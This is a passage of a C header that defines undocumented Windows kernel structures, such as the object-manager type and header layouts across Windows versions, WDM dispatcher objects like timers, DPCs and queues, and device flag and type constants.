{\n    NonPagedPool,\n    NonPagedPoolExecute = NonPagedPool,\n    PagedPool,\n    NonPagedPoolMustSucceed = NonPagedPool + 2,\n    DontUseThisType,\n    NonPagedPoolCacheAligned = NonPagedPool + 4,\n    PagedPoolCacheAligned,\n    NonPagedPoolCacheAlignedMustS = NonPagedPool + 6,\n    MaxPoolType,\n    NonPagedPoolBase = 0,\n    NonPagedPoolBaseMustSucceed = NonPagedPoolBase + 2,\n    NonPagedPoolBaseCacheAligned = NonPagedPoolBase + 4,\n    NonPagedPoolBaseCacheAlignedMustS = NonPagedPoolBase + 6,\n    NonPagedPoolSession = 32,\n    PagedPoolSession = NonPagedPoolSession + 1,\n    NonPagedPoolMustSucceedSession = PagedPoolSession + 1,\n    DontUseThisTypeSession = NonPagedPoolMustSucceedSession + 1,\n    NonPagedPoolCacheAlignedSession = DontUseThisTypeSession + 1,\n    PagedPoolCacheAlignedSession = NonPagedPoolCacheAlignedSession + 1,\n    NonPagedPoolCacheAlignedMustSSession = PagedPoolCacheAlignedSession + 1,\n    NonPagedPoolNx = 512,\n    NonPagedPoolNxCacheAligned = NonPagedPoolNx + 4,\n    NonPagedPoolSessionNx = NonPagedPoolNx + 32\n} POOL_TYPE;\n\n//\n// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_COMPATIBLE {// Size=120\n    USHORT Length; // Size=2 Offset=0\n    UCHAR ObjectTypeFlags; // Size=1 Offset=2\n    ULONG ObjectTypeCode; // Size=4 Offset=4\n    ULONG InvalidAttributes; // Size=4 Offset=8\n    GENERIC_MAPPING GenericMapping; // Size=16 Offset=12\n    ULONG ValidAccessMask; // Size=4 Offset=28\n    ULONG RetainAccess; // Size=4 Offset=32\n    POOL_TYPE PoolType; // Size=4 Offset=36\n    ULONG DefaultPagedPoolCharge; // Size=4 Offset=40\n    ULONG DefaultNonPagedPoolCharge; // Size=4 Offset=44\n    PVOID DumpProcedure; // Size=8 Offset=48\n    PVOID OpenProcedure; // Size=8 Offset=56\n    PVOID CloseProcedure; // Size=8 Offset=64\n    PVOID DeleteProcedure; // Size=8 Offset=72\n    PVOID ParseProcedure; // Size=8 Offset=80\n    PVOID 
SecurityProcedure; // Size=8 Offset=88\n    PVOID QueryNameProcedure; // Size=8 Offset=96\n    PVOID OkayToCloseProcedure; // Size=8 Offset=104\n} OBJECT_TYPE_INITIALIZER_COMPATIBLE, *POBJECT_TYPE_INITIALIZER_COMPATIBLE;\n\n//\n// WARNING this structure is incomplete, refer to complete definitions below if you need actual full variant.\n//\ntypedef struct _OBJECT_TYPE_COMPATIBLE {\n    LIST_ENTRY TypeList;\n    UNICODE_STRING Name;\n    PVOID DefaultObject;\n    UCHAR Index;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    OBJECT_TYPE_INITIALIZER_COMPATIBLE TypeInfo;\n} OBJECT_TYPE_COMPATIBLE, *POBJECT_TYPE_COMPATIBLE;\ntypedef POBJECT_TYPE_COMPATIBLE POBJECT_TYPE;\n\n//\n// Complete definitions of OBJECT_TYPE + OBJECT_TYPE_INITIALIZER per Windows version.\n//\n\ntypedef struct _OBJECT_TYPE_INITIALIZER_7 {\n    USHORT Length;\n    union\n    {\n        UCHAR ObjectTypeFlags;\n        struct\n        {\n            UCHAR CaseInsensitive : 1;\n            UCHAR UnnamedObjectsOnly : 1;\n            UCHAR UseDefaultObject : 1;\n            UCHAR SecurityRequired : 1;\n            UCHAR MaintainHandleCount : 1;\n            UCHAR MaintainTypeList : 1;\n            UCHAR SupportsObjectCallbacks : 1;\n        };\n    };\n    ULONG ObjectTypeCode;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n    ULONG ValidAccessMask;\n    ULONG RetainAccess;\n    POOL_TYPE PoolType;\n    ULONG DefaultPagedPoolCharge;\n    ULONG DefaultNonPagedPoolCharge;\n    PVOID DumpProcedure;\n    PVOID OpenProcedure;\n    PVOID CloseProcedure;\n    PVOID DeleteProcedure;\n    PVOID ParseProcedure;\n    PVOID SecurityProcedure;\n    PVOID QueryNameProcedure;\n    PVOID OkayToCloseProcedure;\n} OBJECT_TYPE_INITIALIZER_7, *POBJECT_TYPE_INITIALIZER_7;\n\n//\n// Windows 8, new object type flag, WaitObject* members added\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_8 {\n    USHORT 
Length;\n    union\n    {\n        UCHAR ObjectTypeFlags;\n        struct\n        {\n            UCHAR CaseInsensitive : 1;\n            UCHAR UnnamedObjectsOnly : 1;\n            UCHAR UseDefaultObject : 1;\n            UCHAR SecurityRequired : 1;\n            UCHAR MaintainHandleCount : 1;\n            UCHAR MaintainTypeList : 1;\n            UCHAR SupportsObjectCallbacks : 1;\n            UCHAR CacheAligned : 1;\n        };\n    };\n    ULONG ObjectTypeCode;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n    ULONG ValidAccessMask;\n    ULONG RetainAccess;\n    POOL_TYPE PoolType;\n    ULONG DefaultPagedPoolCharge;\n    ULONG DefaultNonPagedPoolCharge;\n    PVOID DumpProcedure;\n    PVOID OpenProcedure;\n    PVOID CloseProcedure;\n    PVOID DeleteProcedure;\n    PVOID ParseProcedure;\n    PVOID SecurityProcedure;\n    PVOID QueryNameProcedure;\n    PVOID OkayToCloseProcedure;\n    ULONG WaitObjectFlagMask;\n    USHORT WaitObjectFlagOffset;\n    USHORT WaitObjectPointerOffset;\n} OBJECT_TYPE_INITIALIZER_8, *POBJECT_TYPE_INITIALIZER_8;\n\n//\n// Windows 10 RS1, new ObjectTypeFlags2 flag added, \n// ParseProcedure now has two variants with different parameters.\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_RS1 {\n    USHORT Length;\n    union\n    {\n        UCHAR ObjectTypeFlags;\n        struct\n        {\n            UCHAR CaseInsensitive : 1;\n            UCHAR UnnamedObjectsOnly : 1;\n            UCHAR UseDefaultObject : 1;\n            UCHAR SecurityRequired : 1;\n            UCHAR MaintainHandleCount : 1;\n            UCHAR MaintainTypeList : 1;\n            UCHAR SupportsObjectCallbacks : 1;\n            UCHAR CacheAligned : 1;\n        };\n    };\n    union\n    {\n        UCHAR ObjectTypeFlags2; //for ParseProcedureEx\n        struct\n        {\n            UCHAR UseExtendedParameters : 1;\n            UCHAR Reserved : 7;\n        };\n    };\n    ULONG ObjectTypeCode;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n 
   ULONG ValidAccessMask;\n    ULONG RetainAccess;\n    POOL_TYPE PoolType;\n    ULONG DefaultPagedPoolCharge;\n    ULONG DefaultNonPagedPoolCharge;\n    PVOID DumpProcedure;\n    PVOID OpenProcedure;\n    PVOID CloseProcedure;\n    PVOID DeleteProcedure;\n    union {\n        PVOID ParseProcedure;\n        PVOID ParseProcedureEx;\n    };\n    PVOID SecurityProcedure;\n    PVOID QueryNameProcedure;\n    PVOID OkayToCloseProcedure;\n    ULONG WaitObjectFlagMask;\n    USHORT WaitObjectFlagOffset;\n    USHORT WaitObjectPointerOffset;\n} OBJECT_TYPE_INITIALIZER_RS1, *POBJECT_TYPE_INITIALIZER_RS1;\n\n//\n// ObjectTypeFlags2 merged into the ObjectTypeFlags field, which was extended to USHORT.\n// Was it that hard to do this from the beginning?\n//\ntypedef struct _OBJECT_TYPE_INITIALIZER_RS2 {\n    USHORT Length;\n    union\n    {\n        USHORT ObjectTypeFlags;\n        struct\n        {\n            UCHAR CaseInsensitive : 1;\n            UCHAR UnnamedObjectsOnly : 1;\n            UCHAR UseDefaultObject : 1;\n            UCHAR SecurityRequired : 1;\n            UCHAR MaintainHandleCount : 1;\n            UCHAR MaintainTypeList : 1;\n            UCHAR SupportsObjectCallbacks : 1;\n            UCHAR CacheAligned : 1;\n            UCHAR UseExtendedParameters : 1;//for ParseProcedureEx, second byte of ObjectTypeFlags\n            UCHAR Reserved : 7;\n        };\n    };\n    ULONG ObjectTypeCode;\n    ULONG InvalidAttributes;\n    GENERIC_MAPPING GenericMapping;\n    ULONG ValidAccessMask;\n    ULONG RetainAccess;\n    POOL_TYPE PoolType;\n    ULONG DefaultPagedPoolCharge;\n    ULONG DefaultNonPagedPoolCharge;\n    PVOID DumpProcedure;\n    PVOID OpenProcedure;\n    PVOID CloseProcedure;\n    PVOID DeleteProcedure;\n    union {\n        PVOID ParseProcedure;\n        PVOID ParseProcedureEx;\n    };\n    PVOID SecurityProcedure;\n    PVOID QueryNameProcedure;\n    PVOID OkayToCloseProcedure;\n    ULONG WaitObjectFlagMask;\n    USHORT WaitObjectFlagOffset;\n    USHORT 
WaitObjectPointerOffset;\n} OBJECT_TYPE_INITIALIZER_RS2, *POBJECT_TYPE_INITIALIZER_RS2;\n\n//\n// OBJECT_TYPE definitions vary only because of OBJECT_TYPE_INITIALIZER changes.\n//\ntypedef struct _OBJECT_TYPE_7 {\n    LIST_ENTRY TypeList;\n    UNICODE_STRING Name;\n    PVOID DefaultObject;\n    UCHAR Index;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    OBJECT_TYPE_INITIALIZER_7 TypeInfo;\n    EX_PUSH_LOCK TypeLock;\n    ULONG Key;\n    LIST_ENTRY CallbackList;\n} OBJECT_TYPE_7, *POBJECT_TYPE_7;\n\ntypedef struct _OBJECT_TYPE_8 {\n    LIST_ENTRY TypeList;\n    UNICODE_STRING Name;\n    PVOID DefaultObject;\n    UCHAR Index;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    OBJECT_TYPE_INITIALIZER_8 TypeInfo;\n    EX_PUSH_LOCK TypeLock;\n    ULONG Key;\n    LIST_ENTRY CallbackList;\n} OBJECT_TYPE_8, *POBJECT_TYPE_8;\n\ntypedef struct _OBJECT_TYPE_RS1 {\n    LIST_ENTRY TypeList;\n    UNICODE_STRING Name;\n    PVOID DefaultObject;\n    UCHAR Index;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    OBJECT_TYPE_INITIALIZER_RS1 TypeInfo;\n    EX_PUSH_LOCK TypeLock;\n    ULONG Key;\n    LIST_ENTRY CallbackList;\n} OBJECT_TYPE_RS1, *POBJECT_TYPE_RS1;\n\ntypedef struct _OBJECT_TYPE_RS2 {\n    LIST_ENTRY TypeList;\n    UNICODE_STRING Name;\n    PVOID DefaultObject;\n    UCHAR Index;\n    ULONG TotalNumberOfObjects;\n    ULONG TotalNumberOfHandles;\n    ULONG HighWaterNumberOfObjects;\n    ULONG HighWaterNumberOfHandles;\n    OBJECT_TYPE_INITIALIZER_RS2 TypeInfo;\n    EX_PUSH_LOCK TypeLock;\n    ULONG Key;\n    LIST_ENTRY CallbackList;\n} OBJECT_TYPE_RS2, *POBJECT_TYPE_RS2;\n\n/*\n** brand new header starting from 6.1\n*/\n\ntypedef struct _OBJECT_HEADER {\n    LONG_PTR PointerCount;\n    union\n   
 {\n        LONG_PTR HandleCount;\n        PVOID NextToFree;\n    };\n    EX_PUSH_LOCK Lock;\n    UCHAR TypeIndex;\n    UCHAR TraceFlags;\n    UCHAR InfoMask;\n    UCHAR Flags;\n    union\n    {\n        POBJECT_CREATE_INFORMATION ObjectCreateInfo;\n        PVOID QuotaBlockCharged;\n    };\n    PVOID SecurityDescriptor;\n    QUAD Body;\n} OBJECT_HEADER, *POBJECT_HEADER;\n\n//\n// Actual object header from windows 10-11.\n//\ntypedef struct _OBJECT_HEADER_X {\n    LONG_PTR PointerCount;\n    union\n    {\n        LONG_PTR HandleCount;\n        PVOID NextToFree;\n    };\n\n    EX_PUSH_LOCK Lock;\n    UCHAR TypeIndex;\n\n    union\n    {\n        UCHAR TraceFlags;\n        struct\n        {\n            UCHAR DbgRefTrace : 1;\n            UCHAR DbgTracePermanent : 1;\n        };\n    };\n\n    UCHAR InfoMask;\n\n    union\n    {\n        UCHAR Flags;\n        struct\n        {\n            UCHAR NewObject : 1;\n            UCHAR KernelObject : 1;\n            UCHAR KernelOnlyAccess : 1;\n            UCHAR ExclusiveObject : 1;\n            UCHAR PermanentObject : 1;\n            UCHAR DefaultSecurityQuota : 1;\n            UCHAR SingleHandleEntry : 1;\n            UCHAR DeletedInline : 1;\n        };\n    };\n\n    ULONG Reserved;\n\n    union\n    {\n        POBJECT_CREATE_INFORMATION ObjectCreateInfo;\n        PVOID QuotaBlockCharged;\n    };\n\n    PVOID SecurityDescriptor;\n    QUAD Body;\n\n} OBJECT_HEADER_X, * POBJECT_HEADER_X;\n\n#define OBJECT_TO_OBJECT_HEADER(obj) \\\n    CONTAINING_RECORD( (obj), OBJECT_HEADER, Body )\n\n#define DOSDEVICE_DRIVE_UNKNOWN     0\n#define DOSDEVICE_DRIVE_CALCULATE   1 //e.g. 
symlink\n#define DOSDEVICE_DRIVE_REMOVABLE   2\n#define DOSDEVICE_DRIVE_FIXED       3\n#define DOSDEVICE_DRIVE_REMOTE      4\n#define DOSDEVICE_DRIVE_CDROM       5\n#define DOSDEVICE_DRIVE_RAMDISK     6\n\ntypedef struct _DEVICE_MAP_V1 {\n    OBJECT_DIRECTORY* DosDevicesDirectory;\n    OBJECT_DIRECTORY* GlobalDosDevicesDirectory;\n    PVOID DosDevicesDirectoryHandle;\n    ULONG ReferenceCount;\n    ULONG DriveMap;\n    UCHAR DriveType[32];\n} DEVICE_MAP_V1, * PDEVICE_MAP_V1;\n\ntypedef struct _DEVICE_MAP_V1 DEVICE_MAP_COMPATIBLE;\ntypedef struct _DEVICE_MAP_V1* PDEVICE_MAP_COMPATIBLE;\n\n//Since REDSTONE1 (14393)\ntypedef struct _DEVICE_MAP_V2 {\n    OBJECT_DIRECTORY* DosDevicesDirectory;\n    OBJECT_DIRECTORY* GlobalDosDevicesDirectory;\n    PVOID DosDevicesDirectoryHandle;\n    volatile LONG ReferenceCount;\n    ULONG DriveMap;\n    UCHAR DriveType[32];\n    PEJOB ServerSilo;\n} DEVICE_MAP_V2, * PDEVICE_MAP_V2;\n\n//Since W11 (22000)\ntypedef struct _DEVICE_MAP_V3 {\n    OBJECT_DIRECTORY* DosDevicesDirectory;\n    OBJECT_DIRECTORY* GlobalDosDevicesDirectory;\n    PEJOB ServerSilo;\n    struct _DEVICE_MAP* GlobalDeviceMap;\n    EX_FAST_REF DriveObject[26];\n    LONGLONG ReferenceCount;\n    PVOID DosDevicesDirectoryHandle;\n    ULONG DriveMap;\n    UCHAR DriveType[32];\n} DEVICE_MAP_V3, * PDEVICE_MAP_V3;\n\n/*\n** OBJECT MANAGER END\n*/\n\n/*\n* WDM START\n*/\n#define TIMER_TOLERABLE_DELAY_BITS      6\n#define TIMER_EXPIRED_INDEX_BITS        6\n#define TIMER_PROCESSOR_INDEX_BITS      5\n\ntypedef struct _DISPATCHER_HEADER {\n    union {\n        union {\n            volatile LONG Lock;\n            LONG LockNV;\n        } DUMMYUNIONNAME;\n\n        struct {                            // Events, Semaphores, Gates, etc.\n            UCHAR Type;                     // All (accessible via KOBJECT_TYPE)\n            UCHAR Signalling;\n            UCHAR Size;\n            UCHAR Reserved1;\n        } DUMMYSTRUCTNAME;\n\n        struct {                            // 
Timer\n            UCHAR TimerType;\n            union {\n                UCHAR TimerControlFlags;\n                struct {\n                    UCHAR Absolute : 1;\n                    UCHAR Wake : 1;\n                    UCHAR EncodedTolerableDelay : TIMER_TOLERABLE_DELAY_BITS;\n                } DUMMYSTRUCTNAME;\n            };\n\n            UCHAR Hand;\n            union {\n                UCHAR TimerMiscFlags;\n                struct {\n\n#if !defined(KENCODED_TIMER_PROCESSOR)\n\n                    UCHAR Index : TIMER_EXPIRED_INDEX_BITS;\n\n#else\n\n                    UCHAR Index : 1;\n                    UCHAR Processor : TIMER_PROCESSOR_INDEX_BITS;\n\n#endif\n\n                    UCHAR Inserted : 1;\n                    volatile UCHAR Expired : 1;\n                } DUMMYSTRUCTNAME;\n            } DUMMYUNIONNAME;\n        } DUMMYSTRUCTNAME2;\n\n        struct {                            // Timer2\n            UCHAR Timer2Type;\n            union {\n                UCHAR Timer2Flags;\n                struct {\n                    UCHAR Timer2Inserted : 1;\n                    UCHAR Timer2Expiring : 1;\n                    UCHAR Timer2CancelPending : 1;\n                    UCHAR Timer2SetPending : 1;\n                    UCHAR Timer2Running : 1;\n                    UCHAR Timer2Disabled : 1;\n                    UCHAR Timer2ReservedFlags : 2;\n                } DUMMYSTRUCTNAME;\n            } DUMMYUNIONNAME;\n\n            UCHAR Timer2Reserved1;\n            UCHAR Timer2Reserved2;\n        } DUMMYSTRUCTNAME3;\n\n        struct {                            // Queue\n            UCHAR QueueType;\n            union {\n                UCHAR QueueControlFlags;\n                struct {\n                    UCHAR Abandoned : 1;\n                    UCHAR DisableIncrement : 1;\n                    UCHAR QueueReservedControlFlags : 6;\n                } DUMMYSTRUCTNAME;\n            } DUMMYUNIONNAME;\n\n            UCHAR QueueSize;\n            UCHAR 
QueueReserved;\n        } DUMMYSTRUCTNAME4;\n\n        struct {                            // Thread\n            UCHAR ThreadType;\n            UCHAR ThreadReserved;\n            union {\n                UCHAR ThreadControlFlags;\n                struct {\n                    UCHAR CycleProfiling : 1;\n                    UCHAR CounterProfiling : 1;\n                    UCHAR GroupScheduling : 1;\n                    UCHAR AffinitySet : 1;\n                    UCHAR ThreadReservedControlFlags : 4;\n                } DUMMYSTRUCTNAME;\n            } DUMMYUNIONNAME;\n\n            union {\n                UCHAR DebugActive;\n\n#if !defined(_X86_)\n\n                struct {\n                    BOOLEAN ActiveDR7 : 1;\n                    BOOLEAN Instrumented : 1;\n                    BOOLEAN Minimal : 1;\n                    BOOLEAN Reserved4 : 3;\n                    BOOLEAN UmsScheduled : 1;\n                    BOOLEAN UmsPrimary : 1;\n                } DUMMYSTRUCTNAME;\n\n#endif\n\n            } DUMMYUNIONNAME2;\n        } DUMMYSTRUCTNAME5;\n\n        struct {                         // Mutant\n            UCHAR MutantType;\n            UCHAR MutantSize;\n            BOOLEAN DpcActive;\n            UCHAR MutantReserved;\n        } DUMMYSTRUCTNAME6;\n    } DUMMYUNIONNAME;\n\n    LONG SignalState;                   // Object lock\n    LIST_ENTRY WaitListHead;            // Object lock\n} DISPATCHER_HEADER, *PDISPATCHER_HEADER;\n\ntypedef struct _KEVENT {\n    DISPATCHER_HEADER Header;\n} KEVENT, *PKEVENT, *PRKEVENT;\n\ntypedef struct _FAST_MUTEX {\n    LONG_PTR Count;\n    void *Owner;\n    ULONG Contention;\n    struct _KEVENT Event;\n    ULONG OldIrql;\n    LONG __PADDING__[1];\n} FAST_MUTEX, *PFAST_MUTEX;\n\ntypedef struct _KMUTANT {\n    DISPATCHER_HEADER Header;\n    LIST_ENTRY MutantListEntry;\n    struct _KTHREAD *OwnerThread;\n    BOOLEAN Abandoned;\n    UCHAR ApcDisable;\n} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;\n\ntypedef struct 
_KSEMAPHORE {\n    DISPATCHER_HEADER Header;\n    LONG Limit;\n} KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;\n\ntypedef struct _KTIMER {\n    DISPATCHER_HEADER Header;\n    ULARGE_INTEGER DueTime;\n    LIST_ENTRY TimerListEntry;\n    struct _KDPC *Dpc;\n    ULONG Processor;\n    LONG Period;\n} KTIMER, *PKTIMER, *PRKTIMER;\n\ntypedef struct _KDEVICE_QUEUE_ENTRY {\n    LIST_ENTRY DeviceListEntry;\n    ULONG SortKey;\n    BOOLEAN Inserted;\n} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;\n\ntypedef enum _KDPC_IMPORTANCE {\n    LowImportance,\n    MediumImportance,\n    HighImportance\n} KDPC_IMPORTANCE;\n\ntypedef struct _KDPC {\n    union {\n        ULONG TargetInfoAsUlong;\n        struct {\n            UCHAR Type;\n            UCHAR Importance;\n            volatile USHORT Number;\n        } DUMMYSTRUCTNAME;\n    } DUMMYUNIONNAME;\n\n    SINGLE_LIST_ENTRY DpcListEntry;\n    KAFFINITY ProcessorHistory;\n    PVOID DeferredRoutine;\n    PVOID DeferredContext;\n    PVOID SystemArgument1;\n    PVOID SystemArgument2;\n    __volatile PVOID DpcData;\n} KDPC, *PKDPC, *PRKDPC;\n\ntypedef struct _WAIT_CONTEXT_BLOCK {\n    union {\n        KDEVICE_QUEUE_ENTRY WaitQueueEntry;\n        struct {\n            LIST_ENTRY DmaWaitEntry;\n            ULONG NumberOfChannels;\n            ULONG SyncCallback : 1;\n            ULONG DmaContext : 1;\n            ULONG Reserved : 30;\n        };\n    };\n    PVOID DeviceRoutine;\n    PVOID DeviceContext;\n    ULONG NumberOfMapRegisters;\n    PVOID DeviceObject;\n    PVOID CurrentIrp;\n    PKDPC BufferChainingDpc;\n} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;\n\n#define MAXIMUM_VOLUME_LABEL_LENGTH  (32 * sizeof(WCHAR)) // 32 characters\n\ntypedef struct _VPB {\n    CSHORT Type;\n    CSHORT Size;\n    USHORT Flags;\n    USHORT VolumeLabelLength; // in bytes\n    struct _DEVICE_OBJECT *DeviceObject;\n    struct _DEVICE_OBJECT *RealDevice;\n    ULONG SerialNumber;\n    ULONG ReferenceCount;\n    WCHAR 
VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];\n} VPB, *PVPB;\n\ntypedef struct _KQUEUE {\n    DISPATCHER_HEADER Header;\n    LIST_ENTRY EntryListHead;\n    ULONG CurrentCount;\n    ULONG MaximumCount;\n    LIST_ENTRY ThreadListHead;\n} KQUEUE, *PKQUEUE;\n\ntypedef struct _KDEVICE_QUEUE {\n    CSHORT Type;\n    CSHORT Size;\n    LIST_ENTRY DeviceListHead;\n    KSPIN_LOCK Lock;\n\n#if defined(_AMD64_)\n\n    union {\n        BOOLEAN Busy;\n        struct {\n            LONG64 Reserved : 8;\n            LONG64 Hint : 56;\n        };\n    };\n\n#else\n\n    BOOLEAN Busy;\n\n#endif\n\n} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;\n\nenum _KOBJECTS {\n    EventNotificationObject = 0x0,\n    EventSynchronizationObject = 0x1,\n    MutantObject = 0x2,\n    ProcessObject = 0x3,\n    QueueObject = 0x4,\n    SemaphoreObject = 0x5,\n    ThreadObject = 0x6,\n    GateObject = 0x7,\n    TimerNotificationObject = 0x8,\n    TimerSynchronizationObject = 0x9,\n    Spare2Object = 0xa,\n    Spare3Object = 0xb,\n    Spare4Object = 0xc,\n    Spare5Object = 0xd,\n    Spare6Object = 0xe,\n    Spare7Object = 0xf,\n    Spare8Object = 0x10,\n    Spare9Object = 0x11,\n    ApcObject = 0x12,\n    DpcObject = 0x13,\n    DeviceQueueObject = 0x14,\n    EventPairObject = 0x15,\n    InterruptObject = 0x16,\n    ProfileObject = 0x17,\n    ThreadedDpcObject = 0x18,\n    MaximumKernelObject = 0x19,\n};\n\n#define DO_VERIFY_VOLUME                0x00000002      // ntddk nthal ntifs wdm\n#define DO_BUFFERED_IO                  0x00000004      // ntddk nthal ntifs wdm\n#define DO_EXCLUSIVE                    0x00000008      // ntddk nthal ntifs wdm\n#define DO_DIRECT_IO                    0x00000010      // ntddk nthal ntifs wdm\n#define DO_MAP_IO_BUFFER                0x00000020      // ntddk nthal ntifs wdm\n#define DO_DEVICE_HAS_NAME              0x00000040      // ntddk nthal ntifs\n#define DO_DEVICE_INITIALIZING          0x00000080      // ntddk nthal ntifs wdm\n#define 
DO_SYSTEM_BOOT_PARTITION        0x00000100      // ntddk nthal ntifs\n#define DO_LONG_TERM_REQUESTS           0x00000200      // ntddk nthal ntifs\n#define DO_NEVER_LAST_DEVICE            0x00000400      // ntddk nthal ntifs\n#define DO_SHUTDOWN_REGISTERED          0x00000800      // ntddk nthal ntifs wdm\n#define DO_BUS_ENUMERATED_DEVICE        0x00001000      // ntddk nthal ntifs wdm\n#define DO_POWER_PAGABLE                0x00002000      // ntddk nthal ntifs wdm\n#define DO_POWER_INRUSH                 0x00004000      // ntddk nthal ntifs wdm\n#define DO_POWER_NOOP                   0x00008000\n#define DO_LOW_PRIORITY_FILESYSTEM      0x00010000      // ntddk nthal ntifs\n#define DO_XIP                          0x00020000\n#define DO_DEVICE_TO_BE_RESET           0x04000000      \n#define DO_DAX_VOLUME                   0x10000000    \n\n#define FILE_REMOVABLE_MEDIA                        0x00000001\n#define FILE_READ_ONLY_DEVICE                       0x00000002\n#define FILE_FLOPPY_DISKETTE                        0x00000004\n#define FILE_WRITE_ONCE_MEDIA                       0x00000008\n#define FILE_REMOTE_DEVICE                          0x00000010\n#define FILE_DEVICE_IS_MOUNTED                      0x00000020\n#define FILE_VIRTUAL_VOLUME                         0x00000040\n#define FILE_AUTOGENERATED_DEVICE_NAME              0x00000080\n#define FILE_DEVICE_SECURE_OPEN                     0x00000100\n#define FILE_CHARACTERISTIC_PNP_DEVICE              0x00000800\n#define FILE_CHARACTERISTIC_TS_DEVICE               0x00001000\n#define FILE_CHARACTERISTIC_WEBDAV_DEVICE           0x00002000\n#define FILE_CHARACTERISTIC_CSV                     0x00010000\n#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL    0x00020000\n#define FILE_PORTABLE_DEVICE                        0x00040000\n\n#define FILE_DEVICE_BEEP                0x00000001\n#define FILE_DEVICE_CD_ROM              0x00000002\n#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003\n#define 
FILE_DEVICE_CONTROLLER          0x00000004\n#define FILE_DEVICE_DATALINK            0x00000005\n#define FILE_DEVICE_DFS                 0x00000006\n#define FILE_DEVICE_DISK                0x00000007\n#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008\n#define FILE_DEVICE_FILE_SYSTEM         0x00000009\n#define FILE_DEVICE_INPORT_PORT         0x0000000a\n#define FILE_DEVICE_KEYBOARD            0x0000000b\n#define FILE_DEVICE_MAILSLOT            0x0000000c\n#define FILE_DEVICE_MIDI_IN             0x0000000d\n#define FILE_DEVICE_MIDI_OUT            0x0000000e\n#define FILE_DEVICE_MOUSE               0x0000000f\n#define FILE_DEVICE_MULTI_UNC_PROVIDER  0x00000010\n#define FILE_DEVICE_NAMED_PIPE          0x00000011\n#define FILE_DEVICE_NETWORK             0x00000012\n#define FILE_DEVICE_NETWORK_BROWSER     0x00000013\n#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014\n#define FILE_DEVICE_NULL                0x00000015\n#define FILE_DEVICE_PARALLEL_PORT       0x00000016\n#define FILE_DEVICE_PHYSICAL_NETCARD    0x00000017\n#define FILE_DEVICE_PRINTER             0x00000018\n#define FILE_DEVICE_SCANNER             0x00000019\n#define FILE_DEVICE_SERIAL_MOUSE_PORT   0x0000001a\n#define FILE_DEVICE_SERIAL_PORT         0x0000001b\n#define FILE_DEVICE_SCREEN              0x0000001c\n#define FILE_DEVICE_SOUND               0x0000001d\n#define FILE_DEVICE_STREAMS             0x0000001e\n#define FILE_DEVICE_TAPE                0x0000001f\n#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020\n#define FILE_DEVICE_TRANSPORT           0x00000021\n#define FILE_DEVICE_UNKNOWN             0x00000022\n#define FILE_DEVICE_VIDEO               0x00000023\n#define FILE_DEVICE_VIRTUAL_DISK        0x00000024\n#define FILE_DEVICE_WAVE_IN             0x00000025\n#define FILE_DEVICE_WAVE_OUT            0x00000026\n#define FILE_DEVICE_8042_PORT           0x00000027\n#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028\n#define FILE_DEVICE_BATTERY             0x00000029\n#define 
FILE_DEVICE_BUS_EXTENDER        0x0000002a\n#define FILE_DEVICE_MODEM               0x0000002b\n#define FILE_DEVICE_VDM                 0x0000002c\n#define FILE_DEVICE_MASS_STORAGE        0x0000002d\n#define FILE_DEVICE_SMB                 0x0000002e\n#define FILE_DEVICE_KS                  0x0000002f\n#define FILE_DEVICE_CHANGER             0x00000030\n#define FILE_DEVICE_SMARTCARD           0x00000031\n#define FILE_DEVICE_ACPI                0x00000032\n#define FILE_DEVICE_DVD                 0x00000033\n#define FILE_DEVICE_FULLSCREEN_VIDEO    0x00000034\n#define FILE_DEVICE_DFS_FILE_SYSTEM     0x00000035\n#define FILE_DEVICE_DFS_VOLUME          0x00000036\n#define FILE_DEVICE_SERENUM             0x00000037\n#define FILE_DEVICE_TERMSRV             0x00000038\n#define FILE_DEVICE_KSEC                0x00000039\n#define FILE_DEVICE_FIPS                0x0000003A\n#define FILE_DEVICE_INFINIBAND          0x0000003B\n#define FILE_DEVICE_VMBUS               0x0000003E\n#define FILE_DEVICE_CRYPT_PROVIDER      0x0000003F\n#define FILE_DEVICE_WPD                 0x00000040\n#define FILE_DEVICE_BLUETOOTH           0x00000041\n#define FILE_DEVICE_MT_COMPOSITE        0x00000042\n#define FILE_DEVICE_MT_TRANSPORT        0x00000043\n#define FILE_DEVICE_BIOMETRIC           0x00000044\n#define FILE_DEVICE_PMI                 0x00000045\n#define FILE_DEVICE_EHSTOR              0x00000046\n#define FILE_DEVICE_DEVAPI              0x00000047\n#define FILE_DEVICE_GPIO                0x00000048\n#define FILE_DEVICE_USBEX               0x00000049\n#define FILE_DEVICE_CONSOLE             0x00000050\n#define FILE_DEVICE_NFP                 0x00000051\n#define FILE_DEVICE_SYSENV              0x00000052\n#define 